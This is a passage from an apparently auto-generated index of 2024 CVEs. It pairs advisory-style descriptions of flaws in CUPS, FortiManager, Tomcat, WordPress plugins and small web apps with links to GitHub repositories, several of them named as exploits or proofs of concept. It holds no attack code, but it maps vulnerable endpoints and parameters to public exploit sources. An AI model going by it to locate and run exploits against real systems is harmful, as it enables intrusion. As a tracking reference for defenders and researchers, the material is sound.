implemented in `src/app/api/proxy/route.ts` does not consider redirect and could be bypassed when attacker provides an external malicious URL which redirects to internal resources like a private network or loopback address. Version 1.19.13 contains an improved fix for the issue. + + +- [l8BL/CVE-2024-47066](https://github.com/l8BL/CVE-2024-47066) + +### CVE-2024-47076 (2024-09-26) + +CUPS is a standards-based, open-source printing system, and `libcupsfilters` contains the code of the filters of the former `cups-filters` package as library functions to be used for the data format conversion tasks needed in Printer Applications. The `cfGetPrinterAttributes5` function in `libcupsfilters` does not sanitize IPP attributes returned from an IPP server. When these IPP attributes are used, for instance, to generate a PPD file, this can lead to attacker controlled data to be provided to the rest of the CUPS system. + + +- [mutkus/CVE-2024-47076](https://github.com/mutkus/CVE-2024-47076) + +### CVE-2024-47138 (2024-11-22) + +The administrative interface listens by default on all interfaces on a TCP port and does not require authentication when being accessed. + + +- [wilguard/CVE-2024-47138](https://github.com/wilguard/CVE-2024-47138) + +### CVE-2024-47176 (2024-09-26) + +CUPS is a standards-based, open-source printing system, and `cups-browsed` contains network printing functionality including, but not limited to, auto-discovering print services and shared printers. `cups-browsed` binds to `INADDR_ANY:631`, causing it to trust any packet from any source, and can cause the `Get-Printer-Attributes` IPP request to an attacker controlled URL. When combined with other vulnerabilities, such as CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177, an attacker can execute arbitrary commands remotely on the target machine without authentication when a malicious printer is printed to. + + +- [GO0dspeed/spill](https://github.com/GO0dspeed/spill) +- [workabhiwin09/CVE-2024-47176](https://github.com/workabhiwin09/CVE-2024-47176) +- [tonyarris/CVE-2024-47176-Scanner](https://github.com/tonyarris/CVE-2024-47176-Scanner) +- [mr-r3b00t/CVE-2024-47176](https://github.com/mr-r3b00t/CVE-2024-47176) +- [aytackalinci/CVE-2024-47176](https://github.com/aytackalinci/CVE-2024-47176) +- [lkarlslund/jugular](https://github.com/lkarlslund/jugular) +- [nma-io/CVE-2024-47176](https://github.com/nma-io/CVE-2024-47176) +- [l0n3m4n/CVE-2024-47176](https://github.com/l0n3m4n/CVE-2024-47176) +- [gumerzzzindo/CVE-2024-47176](https://github.com/gumerzzzindo/CVE-2024-47176) +- [MalwareTech/CVE-2024-47176-Scanner](https://github.com/MalwareTech/CVE-2024-47176-Scanner) +- [AxthonyV/CVE-2024-47176](https://github.com/AxthonyV/CVE-2024-47176) +- [gianlu111/CUPS-CVE-2024-47176](https://github.com/gianlu111/CUPS-CVE-2024-47176) +- [0x7556/CVE-2024-47176](https://github.com/0x7556/CVE-2024-47176) + +### CVE-2024-47177 (2024-09-26) + +CUPS is a standards-based, open-source printing system, and cups-filters provides backends, filters, and other software for CUPS 2.x to use on non-Mac OS systems. Any value passed to `FoomaticRIPCommandLine` via a PPD file will be executed as a user controlled command. When combined with other logic bugs as described in CVE_2024-47176, this can lead to remote command execution. + + +- [referefref/cupspot-2024-47177](https://github.com/referefref/cupspot-2024-47177) + +### CVE-2024-47575 (2024-10-23) + +A missing authentication for critical function in FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.12, FortiManager Cloud 6.4.1 through 6.4.7 allows attacker to execute arbitrary code or commands via specially crafted requests. + + +- [watchtowrlabs/Fortijump-Exploit-CVE-2024-47575](https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575) +- [skyalliance/exploit-cve-2024-47575](https://github.com/skyalliance/exploit-cve-2024-47575) +- [expl0itsecurity/CVE-2024-47575](https://github.com/expl0itsecurity/CVE-2024-47575) +- [XiaomingX/cve-2024-47575-exp](https://github.com/XiaomingX/cve-2024-47575-exp) +- [Axi0n1ze/CVE-2024-47575-POC](https://github.com/Axi0n1ze/CVE-2024-47575-POC) + +### CVE-2024-47854 (2024-10-04) + +An XSS vulnerability was discovered in Veritas Data Insight before 7.1. It allows a remote attacker to inject an arbitrary web script into an HTTP request that could reflect back to an authenticated user without sanitization if executed by that user. + + +- [MarioTesoro/CVE-2024-47854](https://github.com/MarioTesoro/CVE-2024-47854) + +### CVE-2024-48197 (2025-01-02) + +Cross Site Scripting vulnerability in Audiocodes MP-202b v.4.4.3 allows a remote attacker to escalate privileges via the login page of the web interface. + + +- [GCatt-AS/CVE-2024-48197](https://github.com/GCatt-AS/CVE-2024-48197) + +### CVE-2024-48208 (2024-10-24) + +pure-ftpd before 1.0.52 is vulnerable to Buffer Overflow. There is an out of bounds read in the domlsd() function of the ls.c file. + + +- [rohilchaudhry/CVE-2024-48208](https://github.com/rohilchaudhry/CVE-2024-48208) + +### CVE-2024-48217 (2024-11-01) + +An Insecure Direct Object Reference (IDOR) in the dashboard of SiSMART v7.4.0 allows attackers to execute a horizontal-privilege escalation. + + +- [ajrielrm/CVE-2024-48217](https://github.com/ajrielrm/CVE-2024-48217) + +### CVE-2024-48245 (2025-01-07) + +Vehicle Management System 1.0 is vulnerable to SQL Injection. A guest user can exploit vulnerable POST parameters in various administrative actions, such as booking a vehicle or confirming a booking. The affected parameters include "Booking ID", "Action Name", and "Payment Confirmation ID", which are present in /newvehicle.php and /newdriver.php. + + +- [ShadowByte1/CVE-2024-48245](https://github.com/ShadowByte1/CVE-2024-48245) + +### CVE-2024-48246 +- [ShadowByte1/CVE-2024-48246](https://github.com/ShadowByte1/CVE-2024-48246) + +### CVE-2024-48322 (2024-11-11) + +UsersController.php in Run.codes 1.5.2 and older has a reset password race condition vulnerability. + + +- [trqt/CVE-2024-48322](https://github.com/trqt/CVE-2024-48322) + +### CVE-2024-48325 (2024-11-06) + +Portabilis i-Educar 2.8.0 is vulnerable to SQL Injection in the "getDocuments" function of the "InstituicaoDocumentacaoController" class. The "instituicao_id" parameter in "/module/Api/InstituicaoDocumentacao?oper=get&resource=getDocuments&instituicao_id" is not properly sanitized, allowing an unauthenticated remote attacker to inject malicious SQL commands. + + +- [osvaldotenorio/cve-2024-48325](https://github.com/osvaldotenorio/cve-2024-48325) + +### CVE-2024-48326 +- [fabiobsj/CVE-2024-48326](https://github.com/fabiobsj/CVE-2024-48326) + +### CVE-2024-48336 (2024-11-04) + +The install() function of ProviderInstaller.java in Magisk App before canary version 27007 does not verify the GMS app before loading it, which allows a local untrusted app with no additional privileges to silently execute arbitrary code in the Magisk app and escalate privileges to root via a crafted package, aka Bug #8279. User interaction is not needed for exploitation. + + +- [canyie/MagiskEoP](https://github.com/canyie/MagiskEoP) + +### CVE-2024-48359 (2024-10-31) + +Qualitor v8.24 was discovered to contain a remote code execution (RCE) vulnerability via the gridValoresPopHidden parameter. + + +- [OpenXP-Research/CVE-2024-48359](https://github.com/OpenXP-Research/CVE-2024-48359) + +### CVE-2024-48360 (2024-10-31) + +Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php. + + +- [OpenXP-Research/CVE-2024-48360](https://github.com/OpenXP-Research/CVE-2024-48360) + +### CVE-2024-48392 +- [Renzusclarke/CVE-2024-48392-PoC](https://github.com/Renzusclarke/CVE-2024-48392-PoC) + +### CVE-2024-48415 (2024-10-22) + +itsourcecode Loan Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via a crafted payload to the lastname, firstname, middlename, address, contact_no, email and tax_id parameters in new borrowers functionality on the Borrowers page. + + +- [khaliquesX/CVE-2024-48415](https://github.com/khaliquesX/CVE-2024-48415) + +### CVE-2024-48427 (2024-10-24) + +A SQL injection vulnerability in Sourcecodester Packers and Movers Management System v1.0 allows remote authenticated users to execute arbitrary SQL commands via the id parameter in /mpms/admin/?page=services/manage_service&id + + +- [vighneshnair7/CVE-2024-48427](https://github.com/vighneshnair7/CVE-2024-48427) + +### CVE-2024-48569 (2024-10-30) + +Proactive Risk Manager version 9.1.1.0 is affected by multiple Cross-Site Scripting (XSS) vulnerabilities in the add/edit form fields, at the urls starting with the subpaths: /ar/config/configuation/ and /ar/config/risk-strategy-control/ + + +- [MarioTesoro/CVE-2024-48569](https://github.com/MarioTesoro/CVE-2024-48569) + +### CVE-2024-48605 (2024-10-22) + +An issue in Helakuru Desktop Application v1.1 allows a local attacker to execute arbitrary code via the lack of proper validation of the wow64log.dll file. + + +- [surajhacx/HelakuruV.1.1-DLLHijack](https://github.com/surajhacx/HelakuruV.1.1-DLLHijack) + +### CVE-2024-48644 (2024-10-22) + +Accounts enumeration vulnerability in the Login Component of Reolink Duo 2 WiFi Camera (Firmware Version v3.0.0.1889_23031701) allows remote attackers to determine valid user accounts via login attempts. This can lead to the enumeration of user accounts and potentially facilitate other attacks, such as brute-forcing of passwords. The vulnerability arises from the application responding differently to login attempts with valid and invalid usernames. + + +- [rosembergpro/CVE-2024-48644](https://github.com/rosembergpro/CVE-2024-48644) + +### CVE-2024-48652 (2024-10-22) + +Cross Site Scripting vulnerability in camaleon-cms v.2.7.5 allows remote attacker to execute arbitrary code via the content group name field. + + +- [paragbagul111/CVE-2024-48652](https://github.com/paragbagul111/CVE-2024-48652) + +### CVE-2024-48705 +- [L41KAA/CVE-2024-48705](https://github.com/L41KAA/CVE-2024-48705) + +### CVE-2024-48762 +- [YZS17/CVE-2024-48762](https://github.com/YZS17/CVE-2024-48762) + +### CVE-2024-48914 (2024-10-15) + +Vendure is an open-source headless commerce platform. Prior to versions 3.0.5 and 2.3.3, a vulnerability in Vendure's asset server plugin allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server. In the same code path is an additional vector for crashing the server via a malformed URI. Patches are available in versions 3.0.5 and 2.3.3. Some workarounds are also available. One may use object storage rather than the local file system, e.g. MinIO or S3, or define middleware which detects and blocks requests with urls containing `/../`. + + +- [EQSTLab/CVE-2024-48914](https://github.com/EQSTLab/CVE-2024-48914) + +### CVE-2024-48955 (2024-10-29) + +Broken access control in NetAdmin 4.030319 returns data with functionalities on the endpoint that "assembles" the functionalities menus, the return of this call is not encrypted and as the system does not validate the session authorization, an attacker can copy the content of the browser of a user with greater privileges having access to the functionalities of the user that the code was copied. + + +- [BrotherOfJhonny/CVE-2024-48955_Overview](https://github.com/BrotherOfJhonny/CVE-2024-48955_Overview) + +### CVE-2024-48990 (2024-11-19) + +Qualys discovered that needrestart, before version 3.8, allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable. + + +- [makuga01/CVE-2024-48990-PoC](https://github.com/makuga01/CVE-2024-48990-PoC) +- [ns989/CVE-2024-48990](https://github.com/ns989/CVE-2024-48990) +- [felmoltor/CVE-2024-48990](https://github.com/felmoltor/CVE-2024-48990) +- [Cyb3rFr0g/CVE-2024-48990-PoC](https://github.com/Cyb3rFr0g/CVE-2024-48990-PoC) +- [pentestfunctions/CVE-2024-48990-PoC-Testing](https://github.com/pentestfunctions/CVE-2024-48990-PoC-Testing) +- [ally-petitt/CVE-2024-48990-Exploit](https://github.com/ally-petitt/CVE-2024-48990-Exploit) +- [r0xdeadbeef/CVE-2024-48990](https://github.com/r0xdeadbeef/CVE-2024-48990) +- [CyberCrowCC/CVE-2024-48990](https://github.com/CyberCrowCC/CVE-2024-48990) +- [NullByte-7w7/CVE-2024-48990](https://github.com/NullByte-7w7/CVE-2024-48990) + +### CVE-2024-49039 (2024-11-12) + +Windows Task Scheduler Elevation of Privilege Vulnerability + + +- [je5442804/WPTaskScheduler_CVE-2024-49039](https://github.com/je5442804/WPTaskScheduler_CVE-2024-49039) +- [Alexandr-bit253/CVE-2024-49039](https://github.com/Alexandr-bit253/CVE-2024-49039) + +### CVE-2024-49112 (2024-12-10) + +Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability + + +- [tnkr/poc_monitor](https://github.com/tnkr/poc_monitor) +- [CCIEVoice2009/CVE-2024-49112](https://github.com/CCIEVoice2009/CVE-2024-49112) + +### CVE-2024-49113 (2024-12-10) + +Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability + + +- [SafeBreach-Labs/CVE-2024-49113](https://github.com/SafeBreach-Labs/CVE-2024-49113) +- [barcrange/CVE-2024-49113-Checker](https://github.com/barcrange/CVE-2024-49113-Checker) +- [YoonJae-rep/CVE-2024-49113](https://github.com/YoonJae-rep/CVE-2024-49113) +- [Sachinart/CVE-2024-49113-Checker](https://github.com/Sachinart/CVE-2024-49113-Checker) + +### CVE-2024-49117 (2024-12-10) + +Windows Hyper-V Remote Code Execution Vulnerability + + +- [mutkus/Microsoft-2024-December-Update-Control](https://github.com/mutkus/Microsoft-2024-December-Update-Control) + +### CVE-2024-49203 (2024-11-20) + +Querydsl 5.1.0 and OpenFeign Querydsl 6.8 allows SQL/HQL injection in orderBy in JPAQuery. + + +- [CSIRTTrizna/CVE-2024-49203](https://github.com/CSIRTTrizna/CVE-2024-49203) + +### CVE-2024-49328 (2024-10-20) + +Authentication Bypass Using an Alternate Path or Channel vulnerability in Vivek Tamrakar WP REST API FNS allows Authentication Bypass.This issue affects WP REST API FNS: from n/a through 1.0.0. + + +- [RandomRobbieBF/CVE-2024-49328](https://github.com/RandomRobbieBF/CVE-2024-49328) + +### CVE-2024-49368 (2024-10-21) + +Nginx UI is a web user interface for the Nginx web server. Prior to version 2.0.0-beta.36, when Nginx UI configures logrotate, it does not verify the input and directly passes it to exec.Command, causing arbitrary command execution. Version 2.0.0-beta.36 fixes this issue. + + +- [Aashay221999/CVE-2024-49368](https://github.com/Aashay221999/CVE-2024-49368) + +### CVE-2024-49369 (2024-11-12) + +Icinga is a monitoring system which checks the availability of network resources, notifies users of outages, and generates performance data for reporting. The TLS certificate validation in all Icinga 2 versions starting from 2.4.0 was flawed, allowing an attacker to impersonate both trusted cluster nodes as well as any API users that use TLS client certificates for authentication (ApiUser objects with the client_cn attribute set). This vulnerability has been fixed in v2.14.3, v2.13.10, v2.12.11, and v2.11.12. + + +- [Quantum-Sicarius/CVE-2024-49369](https://github.com/Quantum-Sicarius/CVE-2024-49369) + +### CVE-2024-49379 (2024-11-13) + +Umbrel is a home server OS for self-hosting. The login functionality of Umbrel before version 1.2.2 contains a reflected cross-site scripting (XSS) vulnerability in use-auth.tsx. An attacker can specify a malicious redirect query parameter to trigger the vulnerability. If a JavaScript URL is passed to the redirect parameter the attacker provided JavaScript will be executed after the user entered their password and clicked on login. This vulnerability is fixed in 1.2.2. + + +- [OHDUDEOKNICE/CVE-2024-49379](https://github.com/OHDUDEOKNICE/CVE-2024-49379) + +### CVE-2024-49607 (2024-10-20) + +Unrestricted Upload of File with Dangerous Type vulnerability in Redwan Hilali WP Dropbox Dropins allows Upload a Web Shell to a Web Server.This issue affects WP Dropbox Dropins: from n/a through 1.0. + + +- [RandomRobbieBF/CVE-2024-49607](https://github.com/RandomRobbieBF/CVE-2024-49607) + +### CVE-2024-49681 (2024-10-24) + +Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SWIT WP Sessions Time Monitoring Full Automatic allows SQL Injection.This issue affects WP Sessions Time Monitoring Full Automatic: from n/a through 1.0.9. + + +- [RandomRobbieBF/CVE-2024-49681](https://github.com/RandomRobbieBF/CVE-2024-49681) + +### CVE-2024-50251 (2024-11-09) + +In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_payload: sanitize offset and length before calling skb_checksum()\n\nIf access to offset + length is larger than the skbuff length, then\nskb_checksum() triggers BUG_ON().\n\nskb_checksum() internally subtracts the length parameter while iterating\nover skbuff, BUG_ON(len) at the end of it checks that the expected\nlength to be included in the checksum calculation is fully consumed. + + +- [slavin-ayu/CVE-2024-50251-PoC](https://github.com/slavin-ayu/CVE-2024-50251-PoC) + +### CVE-2024-50335 (2024-11-05) + +SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. The "Publish Key" field in SuiteCRM's Edit Profile page is vulnerable to Reflected Cross-Site Scripting (XSS), allowing an attacker to inject malicious JavaScript code. This can be exploited to steal CSRF tokens and perform unauthorized actions, such as creating new administrative users without proper authentication. The vulnerability arises due to insufficient input validation and sanitization of the Publish Key field within the SuiteCRM application. When an attacker injects a malicious script, it gets executed within the context of an authenticated user's session. The injected script (o.js) then leverages the captured CSRF token to forge requests that create new administrative users, effectively compromising the integrity and security of the CRM instance. This issue has been addressed in versions 7.14.6 and 8.7.1. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [shellkraft/CVE-2024-50335](https://github.com/shellkraft/CVE-2024-50335) + +### CVE-2024-50340 (2024-11-06) + +symfony/runtime is a module for the Symphony PHP framework which enables decoupling PHP applications from global state. When the `register_argv_argc` php directive is set to `on` , and users call any URL with a special crafted query string, they are able to change the environment or debug mode used by the kernel when handling the request. As of versions 5.4.46, 6.4.14, and 7.1.7 the `SymfonyRuntime` now ignores the `argv` values for non-SAPI PHP runtimes. All users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [Nyamort/CVE-2024-50340](https://github.com/Nyamort/CVE-2024-50340) + +### CVE-2024-50379 (2024-12-17) + +Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability during JSP compilation in Apache Tomcat permits an RCE on case insensitive file systems when the default servlet is enabled for write (non-default configuration).\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97.\n\nUsers are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fixes the issue. + + +- [v3153/CVE-2024-50379-POC](https://github.com/v3153/CVE-2024-50379-POC) +- [yiliufeng168/CVE-2024-50379-POC](https://github.com/yiliufeng168/CVE-2024-50379-POC) +- [JFOZ1010/Nuclei-Template-CVE-2024-50379](https://github.com/JFOZ1010/Nuclei-Template-CVE-2024-50379) +- [iSee857/CVE-2024-50379-PoC](https://github.com/iSee857/CVE-2024-50379-PoC) +- [Alchemist3dot14/CVE-2024-50379](https://github.com/Alchemist3dot14/CVE-2024-50379) +- [ph0ebus/Tomcat-CVE-2024-50379-Poc](https://github.com/ph0ebus/Tomcat-CVE-2024-50379-Poc) +- [SleepingBag945/CVE-2024-50379](https://github.com/SleepingBag945/CVE-2024-50379) +- [dear-cell/CVE-2024-50379](https://github.com/dear-cell/CVE-2024-50379) +- [lizhianyuguangming/CVE-2024-50379-exp](https://github.com/lizhianyuguangming/CVE-2024-50379-exp) +- [dragonked2/CVE-2024-50379-POC](https://github.com/dragonked2/CVE-2024-50379-POC) +- [bigb0x/CVE-2024-50379](https://github.com/bigb0x/CVE-2024-50379) + +### CVE-2024-50395 (2024-11-22) + +An authorization bypass through user-controlled key vulnerability has been reported to affect Media Streaming add-on. If exploited, the vulnerability could allow local network attackers to gain privilege.\n\nWe have already fixed the vulnerability in the following version:\nMedia Streaming add-on 500.1.1.6 ( 2024/08/02 ) and later + + +- [neko-hat/CVE-2024-50395](https://github.com/neko-hat/CVE-2024-50395) + +### CVE-2024-50427 (2024-10-29) + +Unrestricted Upload of File with Dangerous Type vulnerability in Devsoft Baltic OÜ SurveyJS: Drag & Drop WordPress Form Builder.This issue affects SurveyJS: Drag & Drop WordPress Form Builder: from n/a through 1.9.136. + + +- [RandomRobbieBF/CVE-2024-50427](https://github.com/RandomRobbieBF/CVE-2024-50427) + +### CVE-2024-50450 (2024-10-28) + +Improper Control of Generation of Code ('Code Injection') vulnerability in realmag777 WordPress Meta Data and Taxonomies Filter (MDTF) allows Code Injection.This issue affects WordPress Meta Data and Taxonomies Filter (MDTF): from n/a through 1.3.3.4. + + +- [RandomRobbieBF/CVE-2024-50450](https://github.com/RandomRobbieBF/CVE-2024-50450) + +### CVE-2024-50473 (2024-10-29) + +Unrestricted Upload of File with Dangerous Type vulnerability in Ajar Productions Ajar in5 Embed allows Upload a Web Shell to a Web Server.This issue affects Ajar in5 Embed: from n/a through 3.1.3. + + +- [RandomRobbieBF/CVE-2024-50473](https://github.com/RandomRobbieBF/CVE-2024-50473) + +### CVE-2024-50475 (2024-10-29) + +Missing Authorization vulnerability in Scott Gamon Signup Page allows Privilege Escalation.This issue affects Signup Page: from n/a through 1.0. + + +- [RandomRobbieBF/CVE-2024-50475](https://github.com/RandomRobbieBF/CVE-2024-50475) + +### CVE-2024-50476 (2024-10-29) + +Missing Authorization vulnerability in GRÜN Software Group GmbH GRÜN spendino Spendenformular allows Privilege Escalation.This issue affects GRÜN spendino Spendenformular: from n/a through 1.0.1. + + +- [RandomRobbieBF/CVE-2024-50476](https://github.com/RandomRobbieBF/CVE-2024-50476) + +### CVE-2024-50477 (2024-10-28) + +Authentication Bypass Using an Alternate Path or Channel vulnerability in Stacks Stacks Mobile App Builder stacks-mobile-app-builder allows Authentication Bypass.This issue affects Stacks Mobile App Builder: from n/a through 5.2.3. + + +- [RandomRobbieBF/CVE-2024-50477](https://github.com/RandomRobbieBF/CVE-2024-50477) + +### CVE-2024-50478 (2024-10-28) + +Authentication Bypass by Primary Weakness vulnerability in Swoop 1-Click Login: Passwordless Authentication allows Authentication Bypass.This issue affects 1-Click Login: Passwordless Authentication: 1.4.5. + + +- [RandomRobbieBF/CVE-2024-50478](https://github.com/RandomRobbieBF/CVE-2024-50478) + +### CVE-2024-50482 (2024-10-29) + +Unrestricted Upload of File with Dangerous Type vulnerability in Chetan Khandla Woocommerce Product Design allows Upload a Web Shell to a Web Server.This issue affects Woocommerce Product Design: from n/a through 1.0.0. + + +- [RandomRobbieBF/CVE-2024-50482](https://github.com/RandomRobbieBF/CVE-2024-50482) + +### CVE-2024-50483 (2024-10-28) + +Authorization Bypass Through User-Controlled Key vulnerability in Meetup allows Privilege Escalation.This issue affects Meetup: from n/a through 0.1. + + +- [RandomRobbieBF/CVE-2024-50483](https://github.com/RandomRobbieBF/CVE-2024-50483) + +### CVE-2024-50485 (2024-10-29) + +: Incorrect Privilege Assignment vulnerability in Udit Rawat Exam Matrix allows Privilege Escalation.This issue affects Exam Matrix: from n/a through 1.5. + + +- [RandomRobbieBF/CVE-2024-50485](https://github.com/RandomRobbieBF/CVE-2024-50485) + +### CVE-2024-50488 (2024-10-28) + +Authentication Bypass Using an Alternate Path or Channel vulnerability in Priyabrata Sarkar Token Login allows Authentication Bypass.This issue affects Token Login: from n/a through 1.0.3. + + +- [RandomRobbieBF/CVE-2024-50488](https://github.com/RandomRobbieBF/CVE-2024-50488) + +### CVE-2024-50490 (2024-10-29) + +Missing Authorization vulnerability in Szabolcs Szecsenyi PegaPoll allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects PegaPoll: from n/a through 1.0.2. + + +- [RandomRobbieBF/CVE-2024-50490](https://github.com/RandomRobbieBF/CVE-2024-50490) + +### CVE-2024-50493 (2024-10-29) + +Unrestricted Upload of File with Dangerous Type vulnerability in masterhomepage Automatic Translation allows Upload a Web Shell to a Web Server.This issue affects Automatic Translation: from n/a through 1.0.4. + + +- [RandomRobbieBF/CVE-2024-50493](https://github.com/RandomRobbieBF/CVE-2024-50493) + +### CVE-2024-50498 (2024-10-28) + +Improper Control of Generation of Code ('Code Injection') vulnerability in LUBUS WP Query Console allows Code Injection.This issue affects WP Query Console: from n/a through 1.0. + + +- [RandomRobbieBF/CVE-2024-50498](https://github.com/RandomRobbieBF/CVE-2024-50498) +- [p0et08/CVE-2024-50498](https://github.com/p0et08/CVE-2024-50498) +- [Nxploited/CVE-2024-50498](https://github.com/Nxploited/CVE-2024-50498) + +### CVE-2024-50507 (2024-10-30) + +Deserialization of Untrusted Data vulnerability in Daniel Schmitzer DS.DownloadList allows Object Injection.This issue affects DS.DownloadList: from n/a through 1.3. + + +- [RandomRobbieBF/CVE-2024-50507](https://github.com/RandomRobbieBF/CVE-2024-50507) + +### CVE-2024-50508 (2024-10-30) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Chetan Khandla Woocommerce Product Design allows Path Traversal.This issue affects Woocommerce Product Design: from n/a through 1.0.0. + + +- [RandomRobbieBF/CVE-2024-50508](https://github.com/RandomRobbieBF/CVE-2024-50508) + +### CVE-2024-50509 (2024-10-30) + +Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Chetan Khandla Woocommerce Product Design allows Path Traversal.This issue affects Woocommerce Product Design: from n/a through 1.0.0. + + +- [RandomRobbieBF/CVE-2024-50509](https://github.com/RandomRobbieBF/CVE-2024-50509) + +### CVE-2024-50510 (2024-10-30) + +Unrestricted Upload of File with Dangerous Type vulnerability in Web and Print Design AR For Woocommerce allows Upload a Web Shell to a Web Server.This issue affects AR For Woocommerce: from n/a through 6.2. + + +- [RandomRobbieBF/CVE-2024-50510](https://github.com/RandomRobbieBF/CVE-2024-50510) + +### CVE-2024-50623 (2024-10-27) + +In Cleo Harmony before 5.8.0.21, VLTrader before 5.8.0.21, and LexiCom before 5.8.0.21, there is an unrestricted file upload and download that could lead to remote code execution. + + +- [watchtowrlabs/CVE-2024-50623](https://github.com/watchtowrlabs/CVE-2024-50623) +- [verylazytech/CVE-2024-50623](https://github.com/verylazytech/CVE-2024-50623) +- [iSee857/Cleo-CVE-2024-50623-PoC](https://github.com/iSee857/Cleo-CVE-2024-50623-PoC) + +### CVE-2024-50657 (2024-11-22) + +An issue in Owncloud android apk v.4.3.1 allows a physically proximate attacker to escalate privileges via the PassCodeViewModel class, specifically in the checkPassCodeIsValid method + + +- [SAHALLL/CVE-2024-50657](https://github.com/SAHALLL/CVE-2024-50657) + +### CVE-2024-50677 (2024-12-06) + +A cross-site scripting (XSS) vulnerability in OroPlatform CMS v5.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Search parameter. + + +- [ZumiYumi/CVE-2024-50677](https://github.com/ZumiYumi/CVE-2024-50677) + +### CVE-2024-50803 (2024-11-19) + +The mediapool feature of the Redaxo Core CMS application v 5.17.1 is vulnerable to Cross Site Scripting(XSS) which allows a remote attacker to escalate privileges + + +- [Praison001/CVE-2024-50803-Redaxo](https://github.com/Praison001/CVE-2024-50803-Redaxo) + +### CVE-2024-50804 (2024-11-18) + +Insecure Permissions vulnerability in Micro-star International MSI Center Pro 2.1.37.0 allows a local attacker to execute arbitrary code via the Device_DeviceID.dat.bak file within the C:\ProgramData\MSI\One Dragon Center\Data folder + + +- [g3tsyst3m/CVE-2024-50804](https://github.com/g3tsyst3m/CVE-2024-50804) + +### CVE-2024-50848 (2024-11-18) + +An XML External Entity (XXE) vulnerability in the Import object and Translation Memory import functionalities of WorldServer v11.8.2 to access sensitive information and execute arbitrary commands via supplying a crafted .tmx file. + + +- [Wh1teSnak3/CVE-2024-50848](https://github.com/Wh1teSnak3/CVE-2024-50848) + +### CVE-2024-50849 (2024-11-18) + +A Stored Cross-Site Scripting (XSS) vulnerability in the "Rules" functionality of WorldServer v11.8.2 allows a remote authenticated attacker to execute arbitrary JavaScript code. + + +- [Wh1teSnak3/CVE-2024-50849](https://github.com/Wh1teSnak3/CVE-2024-50849) + +### CVE-2024-50944 (2024-12-27) + +Integer overflow vulnerability exists in SimplCommerce at commit 230310c8d7a0408569b292c5a805c459d47a1d8f in the shopping cart functionality. The issue lies in the quantity parameter in the CartController's AddToCart method. + + +- [AbdullahAlmutawa/CVE-2024-50944](https://github.com/AbdullahAlmutawa/CVE-2024-50944) + +### CVE-2024-50945 (2024-12-27) + +An improper access control vulnerability exists in SimplCommerce at commit 230310c8d7a0408569b292c5a805c459d47a1d8f, allowing users to submit reviews without verifying if they have purchased the product. + + +- [AbdullahAlmutawa/CVE-2024-50945](https://github.com/AbdullahAlmutawa/CVE-2024-50945) + +### CVE-2024-50961 +- [fdzdev/CVE-2024-50961](https://github.com/fdzdev/CVE-2024-50961) + +### CVE-2024-50962 +- [fdzdev/CVE-2024-50962](https://github.com/fdzdev/CVE-2024-50962) + +### CVE-2024-50964 +- [fdzdev/CVE-2024-50964](https://github.com/fdzdev/CVE-2024-50964) + +### CVE-2024-50968 (2024-11-14) + +A business logic vulnerability exists in the Add to Cart function of itsourcecode Agri-Trading Online Shopping System 1.0, which allows remote attackers to manipulate the quant parameter when adding a product to the cart. By setting the quantity value to -0, an attacker can exploit a flaw in the application's total price calculation logic. This vulnerability causes the total price to be reduced to zero, allowing the attacker to add items to the cart and proceed to checkout. + + +- [Akhlak2511/CVE-2024-50968](https://github.com/Akhlak2511/CVE-2024-50968) + +### CVE-2024-50969 (2024-11-13) + +A Reflected cross-site scripting (XSS) vulnerability in browse.php of Code-projects Jonnys Liquor 1.0 allows remote attackers to inject arbitrary web scripts or HTML via the search parameter. + + +- [Akhlak2511/CVE-2024-50969](https://github.com/Akhlak2511/CVE-2024-50969) + +### CVE-2024-50970 (2024-11-13) + +A SQL injection vulnerability in orderview1.php of Itsourcecode Online Furniture Shopping Project 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter. + + +- [Akhlak2511/CVE-2024-50970](https://github.com/Akhlak2511/CVE-2024-50970) + +### CVE-2024-50971 (2024-11-13) + +A SQL injection vulnerability in print.php of Itsourcecode Construction Management System 1.0 allows remote attackers to execute arbitrary SQL commands via the map_id parameter. + + +- [Akhlak2511/CVE-2024-50971](https://github.com/Akhlak2511/CVE-2024-50971) + +### CVE-2024-50972 (2024-11-13) + +A SQL injection vulnerability in printtool.php of Itsourcecode Construction Management System 1.0 allows remote attackers to execute arbitrary SQL commands via the borrow_id parameter. + + +- [Akhlak2511/CVE-2024-50972](https://github.com/Akhlak2511/CVE-2024-50972) + +### CVE-2024-50986 (2024-11-15) + +An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file. + + +- [riftsandroses/CVE-2024-50986](https://github.com/riftsandroses/CVE-2024-50986) + +### CVE-2024-51026 (2024-11-11) + +The NetAdmin IAM system (version 4.0.30319) has a Cross 